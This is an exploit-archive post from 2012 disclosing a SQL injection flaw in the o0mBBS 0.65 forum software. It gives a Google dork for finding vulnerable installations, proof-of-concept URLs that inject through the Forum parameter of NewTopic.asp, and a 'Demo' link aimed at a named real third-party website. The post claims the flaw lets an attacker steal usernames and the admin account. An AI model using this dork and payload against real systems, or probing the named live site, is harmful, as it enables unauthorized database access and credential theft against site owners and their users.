facebook facebook twitter rss

o0mBBS Sql Injection

Author: Asmar , Published: 12-06-2012
# --------------------------------------- #
Author : L3b-r1'z
Title : o0mBBS Sql Injection
Date : 6/12/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "o0mBBS version 0.65B"
Version : 0.65
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
Attacker Can Injection Database And Steal The Username And Admin.
# --------------------------------------- #
3) PoC :

http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'

Demo :

http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.
# --------------------------------------- #

Like us on Facebook :